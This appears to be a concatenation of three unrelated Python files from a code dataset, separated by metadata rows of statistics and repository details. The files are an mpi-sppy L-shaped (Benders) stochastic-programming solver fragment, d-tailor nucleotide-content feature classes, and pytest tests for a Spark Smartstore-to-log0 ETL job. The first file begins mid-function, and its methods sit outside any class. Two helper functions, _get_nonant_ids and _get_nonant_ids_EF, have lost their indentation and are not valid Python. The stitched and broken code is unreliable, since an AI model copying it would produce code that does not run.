    # included in the root problem
    eta_indx = [scenario_name for scenario_name in self.all_scenario_names
                if scenario_name not in self.root_scenarios]
    self._add_root_etas(root, eta_indx)

    obj = find_active_objective(root)

    repn = generate_standard_repn(obj.expr, quadratic=True)
    if len(repn.nonlinear_vars) > 0:
        raise ValueError("LShaped does not support models with nonlinear objective functions")

    linear_vars = list(repn.linear_vars)
    linear_coefs = list(repn.linear_coefs)
    quadratic_coefs = list(repn.quadratic_coefs)

    # adjust coefficients by scenario/bundle probability
    # (second-stage terms only; first-stage terms are shared)
    scen_prob = root._mpisppy_probability
    for i,var in enumerate(repn.linear_vars):
        if id(var) not in nonant_ids:
            linear_coefs[i] *= scen_prob
    for i,(x,y) in enumerate(repn.quadratic_vars):
        # only multiply through once
        if id(x) not in nonant_ids:
            quadratic_coefs[i] *= scen_prob
        elif id(y) not in nonant_ids:
            quadratic_coefs[i] *= scen_prob

    # NOTE: the LShaped code negates the objective, so
    #       we do the same here for consistency
    if not self.is_minimizing:
        for i,coef in enumerate(linear_coefs):
            linear_coefs[i] = -coef
        for i,coef in enumerate(quadratic_coefs):
            quadratic_coefs[i] = -coef

    # add the etas
    for var in root.eta.values():
        linear_vars.append(var)
        linear_coefs.append(1)

    expr = LinearExpression(constant=repn.constant, linear_coefs=linear_coefs,
                            linear_vars=linear_vars)
    if repn.quadratic_vars:
        expr += pyo.quicksum(
            (coef*x*y for coef,(x,y) in zip(quadratic_coefs, repn.quadratic_vars))
        )

    root.del_component(obj)

    # set root objective function
    root.obj = pyo.Objective(expr=expr, sense=pyo.minimize)
    self.root = root
def _create_shadow_root(self):
    """Build a lightweight stand-in for the root problem on non-rank-0 ranks.

    The shadow model holds only copies of the nonanticipative variables
    (named to match an arbitrary local scenario's nonants) and the eta
    variables; it carries no objective since it is never optimized here.
    """
    root = pyo.ConcreteModel()
    arb_scen = self.local_scenarios[self.local_scenario_names[0]]
    nonants = arb_scen._mpisppy_node_list[0].nonant_vardata_list
    root_vars = list()
    for v in nonants:
        nonant_shadow = pyo.Var(name=v.name)
        root.add_component(v.name, nonant_shadow)
        root_vars.append(nonant_shadow)
    # etas exist only for scenarios not embedded in the root
    if self.has_root_scens:
        eta_indx = [scenario_name for scenario_name in self.all_scenario_names
                    if scenario_name not in self.root_scenarios]
    else:
        eta_indx = self.all_scenario_names
    self._add_root_etas(root, eta_indx)
    root.obj = None
    self.root = root
    self.root_vars = root_vars
def set_eta_bounds(self):
    """Synchronize the eta lower bounds across ranks and apply them.

    When the bounds were computed (rather than user-supplied), take the
    MAX over all ranks so every rank has the tightest valid bound, then
    set the lower bound on each eta variable present in the root.
    """
    if self.compute_eta_bound:
        ## for scenarios not in self.local_scenarios, these will be a large negative number
        this_etas_lb = np.fromiter((self.valid_eta_lb[scen] for scen in self.all_scenario_names),
                                   float, count=len(self.all_scenario_names))

        all_etas_lb = np.empty_like(this_etas_lb)

        self.mpicomm.Allreduce(this_etas_lb, all_etas_lb, op=MPI.MAX)

        for idx, s in enumerate(self.all_scenario_names):
            self.valid_eta_lb[s] = all_etas_lb[idx]

    # root may not have etas for every scenarios
    for s, v in self.root.eta.items():
        v.setlb(self.valid_eta_lb[s])
def create_root(self):
    """Construct the root problem on rank 0, or a shadow of it elsewhere.

    Only cylinder rank 0 builds and optimizes the real root problem;
    every other rank builds a shadow model that merely holds the
    nonanticipative variables and the eta variables.
    """
    if self.cylinder_rank != 0:
        self._create_shadow_root()
    elif self.has_root_scens:
        self._create_root_with_scenarios()
    else:
        self._create_root_no_scenarios()
def attach_nonant_var_map(self, scenario_name):
    """Record, on the scenario model, a map from each subproblem nonant
    variable to its root-problem counterpart (used by the PH interface)."""
    scenario = self.local_scenarios[scenario_name]
    var_map = pyo.ComponentMap()
    sub_nonants = scenario._mpisppy_data.nonant_indices.values()
    for sub_var, root_var in zip(sub_nonants, self.root_vars):
        # The root variable's name embeds the subproblem variable's name;
        # a mismatch means the variable ordering has been corrupted.
        if sub_var.name not in root_var.name:
            raise Exception("Error: Complicating variable mismatch, sub-problem variables changed order")
        var_map[sub_var] = root_var
    scenario._mpisppy_model.subproblem_to_root_vars_map = var_map
def create_subproblem(self, scenario_name):
    """Subproblem creation function passed into the BendersCutsGenerator.

    Rewrites the scenario model in place: keeps only the second-stage
    part of the objective (probability-weighted, negated if maximizing),
    optionally solves once to compute a valid eta lower bound, relaxes
    integrality, removes first-stage-only constraints, and unlinks the
    first-stage variable bounds (they are enforced in the root).

    Returns:
        (instance, complicating_vars_map) where the map sends each root
        variable to its subproblem counterpart.
    """
    instance = self.local_scenarios[scenario_name]

    nonant_list, nonant_ids = _get_nonant_ids(instance)

    # NOTE: since we use generate_standard_repn below, we need
    #       to unfix any nonants so they'll properly appear
    #       in the objective
    fixed_nonants = [ var for var in nonant_list if var.fixed ]
    for var in fixed_nonants:
        var.fixed = False

    # pulls the scenario objective expression, removes the first stage variables, and sets the new objective
    obj = find_active_objective(instance)

    if not hasattr(instance, "_mpisppy_probability"):
        instance._mpisppy_probability = 1. / self.scenario_count
    _mpisppy_probability = instance._mpisppy_probability

    repn = generate_standard_repn(obj.expr, quadratic=True)
    if len(repn.nonlinear_vars) > 0:
        raise ValueError("LShaped does not support models with nonlinear objective functions")

    linear_vars = list()
    linear_coefs = list()
    quadratic_vars = list()
    quadratic_coefs = list()
    ## we'll assume the constant is part of stage 1 (wlog it is), just
    ## like the first-stage bits of the objective
    constant = repn.constant

    ## only keep the second stage variables in the objective
    for coef, var in zip(repn.linear_coefs, repn.linear_vars):
        id_var = id(var)
        if id_var not in nonant_ids:
            linear_vars.append(var)
            linear_coefs.append(_mpisppy_probability*coef)
    # a quadratic term is second-stage if *either* factor is
    for coef, (x,y) in zip(repn.quadratic_coefs, repn.quadratic_vars):
        id_x = id(x)
        id_y = id(y)
        if id_x not in nonant_ids or id_y not in nonant_ids:
            quadratic_coefs.append(_mpisppy_probability*coef)
            quadratic_vars.append((x,y))

    # checks if model sense is max, if so negates the objective
    if not self.is_minimizing:
        for i,coef in enumerate(linear_coefs):
            linear_coefs[i] = -coef
        for i,coef in enumerate(quadratic_coefs):
            quadratic_coefs[i] = -coef

    expr = LinearExpression(constant=constant, linear_coefs=linear_coefs,
                            linear_vars=linear_vars)
    if quadratic_coefs:
        expr += pyo.quicksum(
            (coef*x*y for coef,(x,y) in zip(quadratic_coefs, quadratic_vars))
        )

    instance.del_component(obj)

    # set subproblem objective function
    instance.obj = pyo.Objective(expr=expr, sense=pyo.minimize)

    ## need to do this here for validity if computing the eta bound
    if self.relax_root:
        # relaxes any integrality constraints for the subproblem
        RelaxIntegerVars().apply_to(instance)

    if self.compute_eta_bound:
        # solve the (re-fixed) subproblem once; its lower bound is a valid
        # lower bound for this scenario's eta variable
        for var in fixed_nonants:
            var.fixed = True
        opt = pyo.SolverFactory(self.options["sp_solver"])
        if self.options["sp_solver_options"]:
            for k,v in self.options["sp_solver_options"].items():
                opt.options[k] = v

        if sputils.is_persistent(opt):
            set_instance_retry(instance, opt, scenario_name)
            res = opt.solve(tee=False)
        else:
            res = opt.solve(instance, tee=False)

        eta_lb = res.Problem[0].Lower_bound

        self.valid_eta_lb[scenario_name] = eta_lb

    # if not done above
    if not self.relax_root:
        # relaxes any integrality constraints for the subproblem
        RelaxIntegerVars().apply_to(instance)

    # iterates through constraints and removes first stage constraints from the model
    # the id dict is used to improve the speed of identifying the stage each variables belongs to
    for constr_data in list(itertools.chain(
            instance.component_data_objects(SOSConstraint, active=True, descend_into=True)
            , instance.component_data_objects(Constraint, active=True, descend_into=True))):
        if _first_stage_only(constr_data, nonant_ids):
            _del_con(constr_data)

    # creates the sub map to remove first stage variables from objective expression
    complicating_vars_map = pyo.ComponentMap()
    subproblem_to_root_vars_map = pyo.ComponentMap()

    # creates the complicating var map that connects the first stage variables in the sub problem to those in
    # the root problem -- also set the bounds on the subproblem root vars to be none for better cuts
    for var, rvar in zip(nonant_list, self.root_vars):
        if var.name not in rvar.name: # rvar.name may be part of a bundle
            raise Exception("Error: Complicating variable mismatch, sub-problem variables changed order")
        complicating_vars_map[rvar] = var
        subproblem_to_root_vars_map[var] = rvar
        # these are already enforced in the root
        # don't need to be enfored in the subproblems
        var.setlb(None)
        var.setub(None)
        var.fixed = False

    # this is for interefacing with PH code
    instance._mpisppy_model.subproblem_to_root_vars_map = subproblem_to_root_vars_map

    if self.store_subproblems:
        self.subproblems[scenario_name] = instance

    return instance, complicating_vars_map
def lshaped_algorithm(self, converger=None):
    """Run the L-shaped (Benders) algorithm.

    Alternates between solving the root problem (on cylinder rank 0) and
    generating Benders cuts from the subproblems, until no cuts are added,
    a hub/converger signals convergence, or ``max_iter`` is reached.

    Args:
        converger: optional converger *class*; it is instantiated here.

    Returns:
        The last root-solve results object (None on non-zero ranks).
    """
    if converger:
        converger = converger(self, self.cylinder_rank, self.n_proc)
    # options with defaults
    max_iter = 30
    if "max_iter" in self.options:
        max_iter = self.options["max_iter"]
    tol = 1e-8
    if "tol" in self.options:
        tol = self.options["tol"]
    verbose = True
    if "verbose" in self.options:
        verbose = self.options["verbose"]
    root_solver = self.options["root_solver"]
    sp_solver = self.options["sp_solver"]

    # creates the root problem
    self.create_root()
    m = self.root
    assert hasattr(m, "obj")

    # prevents problems from first stage variables becoming unconstrained
    # after processing
    _init_vars(self.root_vars)

    # sets up the BendersCutGenerator object
    m.bender = LShapedCutGenerator()

    m.bender.set_input(root_vars=self.root_vars, tol=tol, comm=self.mpicomm)

    # let the cut generator know who's using it, probably should check that this is called after set input
    m.bender.set_ls(self)

    # set the eta variables, removing this from the add_suproblem function so we can
    # Pass all the scenarios in the problem to bender.add_subproblem
    # and let it internally handle which ranks get which scenarios
    if self.has_root_scens:
        sub_scenarios = [
            scenario_name for scenario_name in self.local_scenario_names
            if scenario_name not in self.root_scenarios
        ]
    else:
        sub_scenarios = self.local_scenario_names
    for scenario_name in self.local_scenario_names:
        if scenario_name in sub_scenarios:
            subproblem_fn_kwargs = dict()
            subproblem_fn_kwargs['scenario_name'] = scenario_name
            m.bender.add_subproblem(
                subproblem_fn=self.create_subproblem,
                subproblem_fn_kwargs=subproblem_fn_kwargs,
                root_eta=m.eta[scenario_name],
                subproblem_solver=sp_solver,
                subproblem_solver_options=self.options["sp_solver_options"]
            )
        else:
            # scenario embedded in the root: just wire up the PH var map
            self.attach_nonant_var_map(scenario_name)

    # set the eta bounds if computed
    # by self.create_subproblem
    self.set_eta_bounds()

    if self.cylinder_rank == 0:
        opt = pyo.SolverFactory(root_solver)
        if opt is None:
            raise Exception("Error: Failed to Create Master Solver")

        # set options
        for k,v in self.options["root_solver_options"].items():
            opt.options[k] = v

        is_persistent = sputils.is_persistent(opt)
        if is_persistent:
            set_instance_retry(m, opt, "root")

    t = time.time()
    res, t1, t2 = None, None, None

    # benders solve loop, repeats the benders root - subproblem
    # loop until either a no more cuts can are generated
    # or the maximum iterations limit is reached
    for self.iter in range(max_iter):
        if verbose and self.cylinder_rank == 0:
            if self.iter > 0:
                print("Current Iteration:", self.iter + 1, "Time Elapsed:", "%7.2f" % (time.time() - t), "Time Spent on Last Master:", "%7.2f" % t1,
                      "Time Spent Generating Last Cut Set:", "%7.2f" % t2, "Current Objective:", "%7.2f" % m.obj.expr())
            else:
                print("Current Iteration:", self.iter + 1, "Time Elapsed:", "%7.2f" % (time.time() - t), "Current Objective: -Inf")
        t1 = time.time()
        # buffers for broadcasting rank-0's root solution to all ranks
        x_vals = np.zeros(len(self.root_vars))
        eta_vals = np.zeros(self.scenario_count)
        outer_bound = np.zeros(1)
        if self.cylinder_rank == 0:
            if is_persistent:
                res = opt.solve(tee=False)
            else:
                res = opt.solve(m, tee=False)
            # LShaped is always minimizing
            outer_bound[0] = res.Problem[0].Lower_bound
            for i, var in enumerate(self.root_vars):
                x_vals[i] = var.value
            for i, eta in enumerate(m.eta.values()):
                eta_vals[i] = eta.value

        self.mpicomm.Bcast(x_vals, root=0)
        self.mpicomm.Bcast(eta_vals, root=0)
        self.mpicomm.Bcast(outer_bound, root=0)

        if self.is_minimizing:
            self._LShaped_bound = outer_bound[0]
        else:
            # LShaped is always minimizing, so negate
            # the outer bound for sharing broadly
            self._LShaped_bound = -outer_bound[0]

        if self.cylinder_rank != 0:
            # install the broadcast solution into the shadow root
            for i, var in enumerate(self.root_vars):
                var._value = x_vals[i]
            for i, eta in enumerate(m.eta.values()):
                eta._value = eta_vals[i]
        t1 = time.time() - t1

        # The hub object takes precedence over the converger
        # We'll send the nonants now, and check for a for
        # convergence
        if self.spcomm:
            self.spcomm.sync(send_nonants=True)
            if self.spcomm.is_converged():
                break

        t2 = time.time()
        cuts_added = m.bender.generate_cut()
        t2 = time.time() - t2

        if self.cylinder_rank == 0:
            for c in cuts_added:
                if is_persistent:
                    opt.add_constraint(c)
            # no new cuts on rank 0 means the algorithm has converged
            if verbose and len(cuts_added) == 0:
                print(
                    f"Converged in {self.iter+1} iterations.\n"
                    f"Total Time Elapsed: {time.time()-t:7.2f} "
                    f"Time Spent on Last Master: {t1:7.2f} "
                    f"Time spent verifying second stage: {t2:7.2f} "
                    f"Final Objective: {m.obj.expr():7.2f}"
                )
                self.first_stage_solution_available = True
                self.tree_solution_available = True
                break
            if verbose and self.iter == max_iter - 1:
                print("WARNING MAX ITERATION LIMIT REACHED !!! ")
        else:
            if len(cuts_added) == 0:
                break
        # The hub object takes precedence over the converger
        if self.spcomm:
            self.spcomm.sync(send_nonants=False)
            if self.spcomm.is_converged():
                break
        if converger:
            converger.convergence_value()
            if converger.is_converged():
                if verbose and self.cylinder_rank == 0:
                    print(
                        f"Converged to user criteria in {self.iter+1} iterations.\n"
                        f"Total Time Elapsed: {time.time()-t:7.2f} "
                        f"Time Spent on Last Master: {t1:7.2f} "
                        f"Time spent verifying second stage: {t2:7.2f} "
                        f"Final Objective: {m.obj.expr():7.2f}"
                    )
                break
    return res
def _del_con(c):
    """Delete a constraint data object from its parent container."""
    parent = c.parent_component()
    if parent.is_indexed():
        # remove just this member of the indexed constraint
        del parent[c.index()]
    else:
        assert parent is c
        c.parent_block().del_component(c)
def _del_var(v):
    """Delete a variable data object from its parent container."""
    parent = v.parent_component()
    if parent.is_indexed():
        # remove just this member of the indexed variable
        del parent[v.index()]
    else:
        assert parent is v
        v.parent_block().del_component(v)
def _get_nonant_ids(instance):
assert len(instance._mpisppy_node_list) == 1
# set comprehension
nonant_list = instance._mpisppy_node_list[0].nonant_vardata_list
return nonant_list, { id(var) for var in nonant_list }
def _get_nonant_ids_EF(instance):
assert len(instance._mpisppy_data.nlens) == 1
ndn, nlen = list(instance._mpisppy_data.nlens.items())[0]
## this is for the cut variables, so we just need (and want)
## exactly one set of them
nonant_list = list(instance.ref_vars[ndn,i] for i in range(nlen))
## this is for adjusting the objective, so needs all the nonants
## in the EF
snames = instance._ef_scenario_names
nonant_ids = set()
for s in snames:
nonant_ids.update( (id(v) for v in \
getattr(instance, s)._mpisppy_node_list[0].nonant_vardata_list)
)
return nonant_list, nonant_ids
def _first_stage_only(constr_data, nonant_ids):
    """Return True iff every variable appearing in the constraint body is a
    first-stage (nonant) variable."""
    return all(
        id(var) in nonant_ids
        for var in identify_variables(constr_data.body)
    )
def _init_vars(varlist):
    """Give every un-valued Pyomo var in *varlist* a starting value.

    Preference order: the lower bound if it exists, else the upper bound
    if it exists, else 0.
    """
    for var in varlist:
        if var.value is not None:
            continue
        if var.lb is not None:
            bound = var.lb
        elif var.ub is not None:
            bound = var.ub
        else:
            bound = None
        var.set_value(0 if bound is None else pyo.value(bound))
def main():
    """Demo driver: solve the farmer example with the L-shaped method."""
    import os
    import mpisppy.tests.examples.farmer as ref

    # Silence every rank except rank 0 so output is printed only once.
    # (The original comment said "rank 1", but the code checks rank 0.)
    if MPI.COMM_WORLD.Get_rank() != 0:
        sys.stdout = open(os.devnull, 'w')

    scenario_names = ['scen' + str(i) for i in range(3)]
    options = {
        "root_solver": "gurobi_persistent",
        "sp_solver": "gurobi_persistent",
        "sp_solver_options": {"threads": 1},
        # a valid lower bound on eta for every scenario
        "valid_eta_lb": {name: -432000 for name in scenario_names},
        "max_iter": 10,
    }
    ls = LShapedMethod(options, scenario_names, ref.scenario_creator)
    res = ls.lshaped_algorithm()

    if ls.cylinder_rank == 0:
        print(res)
# Run the demo only when executed as a script (not on import).
if __name__ == '__main__':
    main()
| 39.824968 | 152 | 0.607226 | 3,863 | 30,944 | 4.660368 | 0.137458 | 0.020941 | 0.015997 | 0.014442 | 0.433817 | 0.385547 | 0.341332 | 0.297173 | 0.255791 | 0.238016 | 0 | 0.005302 | 0.317283 | 30,944 | 776 | 153 | 39.876289 | 0.846871 | 0.207601 | 0 | 0.358527 | 0 | 0 | 0.066363 | 0 | 0 | 0 | 0 | 0 | 0.00969 | 1 | 0.03876 | false | 0 | 0.034884 | 0.001938 | 0.091085 | 0.011628 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bfcbc5d0c314cd0ac9510073757086968e66ea31 | 4,812 | py | Python | Features/NucleotideContent.py | jcg/d-tailor | 7ea83bcf7a2cda21eb8727575ff2b20ac8b49606 | [
"BSD-2-Clause"
] | 14 | 2016-05-19T08:31:44.000Z | 2021-08-05T08:56:56.000Z | Features/NucleotideContent.py | jcg/d-tailor | 7ea83bcf7a2cda21eb8727575ff2b20ac8b49606 | [
"BSD-2-Clause"
] | 1 | 2018-09-25T12:00:23.000Z | 2018-12-10T18:42:31.000Z | Features/NucleotideContent.py | jcg/d-tailor | 7ea83bcf7a2cda21eb8727575ff2b20ac8b49606 | [
"BSD-2-Clause"
] | 4 | 2016-06-23T21:40:49.000Z | 2021-02-02T03:05:35.000Z | '''
Created on Nov 16, 2011
@author: jcg
'''
from Features.Feature import Feature
import Functions
from uuid import uuid4
class NucleotideContent(Feature):
    """
    Nucleotide Content Feature

    solution - solution where nucleotide content should be computed
    label - some label to append to the name
    hi_range - start and end position to calculate nucleotide content - a tuple in the form (start, end)
    mutable_region - a list with all bases that can be mutated
    cds_region - a pair with begin and end of CDSs - example: (0,100)
    keep_aa - boolean option indicating if in the design mode amino acids should be kept
    """

    # NOTE(review): the mutable default ``args`` dict is shared across calls;
    # it is only read here, so this is safe as long as callers never mutate it.
    def __init__(self, nucleotideContentObject=None, solution=None, label="",
                 args={'ntcontent_range': (0, 9),
                       'mutable_region': None,
                       'cds_region': None,
                       'keep_aa': True}):
        if nucleotideContentObject is None:  # create new instance
            # General properties of feature
            Feature.__init__(self, solution=solution, label=label)
            # Specifics of this Feature
            self.ntcontent_range = args['ntcontent_range']
            self.sequence = solution.sequence[self.ntcontent_range[0]:self.ntcontent_range[1] + 1]
            # ``dict.has_key`` was removed in Python 3; ``in`` works on both 2 and 3
            self.mutable_region = args['mutable_region'] if 'mutable_region' in args else solution.mutable_region
            self.cds_region = args['cds_region'] if 'cds_region' in args else solution.cds_region
            self.keep_aa = args['keep_aa'] if 'keep_aa' in args else solution.keep_aa
            self.set_scores()
            self.set_level()
        else:  # copy constructor
            Feature.__init__(self, nucleotideContentObject)
            self.ntcontent_range = nucleotideContentObject.ntcontent_range
            self.sequence = nucleotideContentObject.sequence
            self.mutable_region = nucleotideContentObject.mutable_region
            self.cds_region = nucleotideContentObject.cds_region
            self.keep_aa = nucleotideContentObject.keep_aa
            self.scores = nucleotideContentObject.scores

    def set_scores(self, scoring_function=Functions.analyze_ntcontent):
        """Score the sequence slice and tag each score key with this feature's label."""
        self.scores = Functions.appendLabelToDict(scoring_function(self.sequence), self.label)

    def mutate(self, operator=Functions.SimpleNtContentOperator):
        """Produce a mutated Solution, or None when no mutation is possible.

        Relies on ``self.nucleotides`` being set by a subclass (e.g.
        NucleotideContentAT) before this method is called.
        """
        if not self.targetInstructions:
            return None
        new_seq = operator(self.solution.sequence, self.targetInstructions['direction'], self.nucleotides, self.mutable_region, self.cds_region, keep_aa=self.keep_aa)
        if not new_seq:
            return None
        return Solution.Solution(sol_id=str(uuid4().int), sequence=new_seq, cds_region=self.cds_region, mutable_region=list(self.mutable_region), parent=self.solution, design=self.solution.designMethod)
class NucleotideContentAT(NucleotideContent):
    """
    Check AT content
    """
    def __init__(self, nucleotideContentObject):
        NucleotideContent.__init__(self,nucleotideContentObject)
        # bases this feature counts/mutates (consumed by NucleotideContent.mutate)
        self.nucleotides = ['a','t']
        self.set_level()
class NucleotideContentGC(NucleotideContent):
    """
    Check GC content
    """
    def __init__(self, nucleotideContentObject):
        NucleotideContent.__init__(self,nucleotideContentObject)
        # bases this feature counts/mutates (consumed by NucleotideContent.mutate)
        self.nucleotides = ['g','c']
        self.set_level()
class NucleotideContentA(NucleotideContent):
    """
    Check A content
    """
    def __init__(self, nucleotideContentObject):
        NucleotideContent.__init__(self,nucleotideContentObject)
        # bases this feature counts/mutates (consumed by NucleotideContent.mutate)
        self.nucleotides = ['a']
        self.set_level()
class NucleotideContentT(NucleotideContent):
    """
    Check T content
    """
    def __init__(self, nucleotideContentObject):
        NucleotideContent.__init__(self,nucleotideContentObject)
        # bases this feature counts/mutates (consumed by NucleotideContent.mutate)
        self.nucleotides = ['t']
        self.set_level()
class NucleotideContentG(NucleotideContent):
    """
    Check G content
    """
    def __init__(self, nucleotideContentObject):
        NucleotideContent.__init__(self,nucleotideContentObject)
        # bases this feature counts/mutates (consumed by NucleotideContent.mutate)
        self.nucleotides = ['g']
        self.set_level()
class NucleotideContentC(NucleotideContent):
    """
    Check C content
    """
    def __init__(self, nucleotideContentObject):
        NucleotideContent.__init__(self,nucleotideContentObject)
        # bases this feature counts/mutates (consumed by NucleotideContent.mutate)
        self.nucleotides = ['c']
        self.set_level()
import Solution | 43.745455 | 206 | 0.625104 | 461 | 4,812 | 6.266811 | 0.266811 | 0.041537 | 0.150225 | 0.082381 | 0.282451 | 0.217376 | 0.217376 | 0.217376 | 0.217376 | 0.217376 | 0 | 0.004993 | 0.292394 | 4,812 | 110 | 207 | 43.745455 | 0.843465 | 0.14256 | 0 | 0.323077 | 0 | 0 | 0.035105 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.138462 | false | 0 | 0.061538 | 0 | 0.353846 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bfcdbaafa9988638af7ac347c436a853bc52d3ed | 6,090 | py | Python | python/etl/tests/spark/app/test_smartstore_src_to_log0.py | beobest2/delta | 0107d5322492c420a044fa41d90be03375606bea | [
"Apache-2.0"
] | 1 | 2021-12-01T00:35:13.000Z | 2021-12-01T00:35:13.000Z | python/etl/tests/spark/app/test_smartstore_src_to_log0.py | beobest2/delta | 0107d5322492c420a044fa41d90be03375606bea | [
"Apache-2.0"
] | null | null | null | python/etl/tests/spark/app/test_smartstore_src_to_log0.py | beobest2/delta | 0107d5322492c420a044fa41d90be03375606bea | [
"Apache-2.0"
] | null | null | null | from argparse import Namespace
import pytest
from laplace_spark.app.smartstore_src_to_log0 import SparkAppSmartstoreSrcToLog0
from laplace_spark.constants import DATE_ID_COLUMN_NAME
from laplace_spark.modules.provider import Provider
from laplace_spark.modules.utils.laplace_utils import LaplaceUtils
from tests.utils import recursive_delete_s3_key
@pytest.fixture()
def spark_app_smartstore_src_to_log0(spark_session):
    # System under test, built on the shared Spark session fixture.
    yield SparkAppSmartstoreSrcToLog0(spark_session=spark_session)


@pytest.fixture()
def data_category():
    # Data category exercised by all tests below.
    yield "order"


@pytest.fixture()
def mall_id():
    yield "dummy_mall_id"


@pytest.fixture()
def login_type():
    yield "NAVER"


@pytest.fixture()
def mall_name():
    yield "dummy_mall_name"
@pytest.fixture()
def args(data_category, mall_id, login_type, mall_name):
    # CLI-style argv list, as the application's arg parser would receive it.
    yield [
        "--data-category",
        data_category,
        "--mall-id",
        mall_id,
        "--login-type",
        login_type,
        "--mall-name",
        mall_name,
    ]


@pytest.fixture()
def args_namespace(data_category, mall_id, login_type, mall_name):
    # Pre-parsed equivalent of the ``args`` fixture.
    yield Namespace(
        data_category=data_category,
        mall_id=mall_id,
        login_type=login_type,
        mall_name=mall_name,
    )
@pytest.fixture()
def data_set_key(mall_id, login_type, mall_name):
    # Expected hash key derived from the mall identity fields, matching the
    # key the application uses when building S3 path prefixes.
    laplace_utils = LaplaceUtils(provider=Provider.SMARTSTORE.value)
    yield laplace_utils.hash_creator(
        {
            "mall_id": mall_id,
            "login_type": login_type,
            "mall_name": mall_name,
        }
    )
@pytest.fixture()
def smartstore_sourcing_delta_path(
    laplace_dashboard_bucket_name,
    df_smartstore_sourcing,
    s3,
):
    # Delta table seeded with the sourcing dataframe; the S3 key is removed
    # again after the test.
    key = "dummy"
    path = f"s3a://{laplace_dashboard_bucket_name}/{key}"
    df_smartstore_sourcing.write.format("delta").save(path)
    yield path
    recursive_delete_s3_key(s3, laplace_dashboard_bucket_name, key)


@pytest.fixture()
def smartstore_log0_different_schema_table_path(
    laplace_dashboard_bucket_name,
    df_smartstore_sourcing,
    s3,
):
    # Same as above, but written without the date-id column so tests can
    # exercise writing against a table with a different (older) schema.
    df_no_date_id = df_smartstore_sourcing.drop(DATE_ID_COLUMN_NAME)
    key = "dummy"
    path = f"s3a://{laplace_dashboard_bucket_name}/{key}"
    df_no_date_id.write.format("delta").save(path)
    yield path
    recursive_delete_s3_key(s3, laplace_dashboard_bucket_name, key)
class TestClassSparkAppSmartstoreSrcToLog0:
    """Tests for SparkAppSmartstoreSrcToLog0: argument parsing, S3 path
    construction, and delta-table read/write round trips."""

    def test_get_arg_parser_success(
        self,
        spark_app_smartstore_src_to_log0,
        args,
        data_category,
        mall_id,
        login_type,
        mall_name,
    ):
        # Parsing the argv-style ``args`` list must reproduce every field.
        arg_parser = spark_app_smartstore_src_to_log0.get_arg_parser()
        parsed = arg_parser.parse_args(args)
        assert parsed.data_category == data_category
        assert parsed.mall_id == mall_id
        assert parsed.login_type == login_type
        assert parsed.mall_name == mall_name

    def test_get_path_prefix_success(
        self,
        spark_app_smartstore_src_to_log0,
        mall_id,
        login_type,
        mall_name,
        data_category,
        data_set_key,
    ):
        # Prefix is bucket / provider / hashed data-set key / category.
        path_prefix = spark_app_smartstore_src_to_log0.get_path_prefix(
            mall_id=mall_id,
            login_type=login_type,
            mall_name=mall_name,
            data_category=data_category,
        )
        assert path_prefix == (
            "s3a://laplace-dashboard"
            f"/{Provider.SMARTSTORE.value}/{data_set_key}/{data_category}"
        )

    def test_get_src_path_success(
        self, spark_app_smartstore_src_to_log0, args_namespace, data_set_key
    ):
        # Source path is the prefix plus the "sourcing" stage suffix.
        src_path = spark_app_smartstore_src_to_log0.get_src_path(args_namespace)
        assert src_path == (
            "s3a://laplace-dashboard"
            f"/{Provider.SMARTSTORE.value}/{data_set_key}/{args_namespace.data_category}/sourcing"
        )

    def test_get_dest_path_success(
        self,
        spark_app_smartstore_src_to_log0,
        args_namespace,
        data_set_key,
    ):
        # Destination path is the prefix plus the "log0" stage suffix.
        dest_path = spark_app_smartstore_src_to_log0.get_dest_path(args_namespace)
        assert dest_path == (
            "s3a://laplace-dashboard"
            f"/{Provider.SMARTSTORE.value}/{data_set_key}/{args_namespace.data_category}/log0"
        )

    def test_read_success(
        self,
        spark_app_smartstore_src_to_log0,
        smartstore_sourcing_delta_path,
        df_smartstore_sourcing,
    ):
        # Reading the seeded delta table returns schema and rows unchanged.
        df = spark_app_smartstore_src_to_log0.read(smartstore_sourcing_delta_path)
        assert df.schema == df_smartstore_sourcing.schema
        assert df.collect() == df_smartstore_sourcing.collect()

    def test_write_success(
        self,
        spark_app_smartstore_src_to_log0,
        df_smartstore_sourcing,
        laplace_dashboard_bucket_name,
        spark_session,
    ):
        path = f"s3a://{laplace_dashboard_bucket_name}/"
        spark_app_smartstore_src_to_log0.write(path, df_smartstore_sourcing)
        df = spark_session.read.format("delta").load(path)
        assert df.schema == df_smartstore_sourcing.schema
        # compare as sets of rows: write order is not guaranteed
        collected_from_s3 = df.collect()
        collected_original = df_smartstore_sourcing.collect()
        assert all(row in collected_original for row in collected_from_s3)
        assert all(row in collected_from_s3 for row in collected_original)

    def test_write_success_with_different_schema_existing(
        self,
        spark_app_smartstore_src_to_log0,
        df_smartstore_sourcing,
        smartstore_log0_different_schema_table_path,
        spark_session,
    ):
        # Writing into a table whose existing schema lacks the date-id column
        # must still end up with the full (new) schema and all rows intact.
        spark_app_smartstore_src_to_log0.write(
            smartstore_log0_different_schema_table_path,
            df_smartstore_sourcing,
        )
        df = spark_session.read.format("delta").load(
            smartstore_log0_different_schema_table_path,
        )
        assert df.schema == df_smartstore_sourcing.schema
        collected_from_s3 = df.collect()
        collected_original = df_smartstore_sourcing.collect()
        assert all(row in collected_original for row in collected_from_s3)
        assert all(row in collected_from_s3 for row in collected_original)
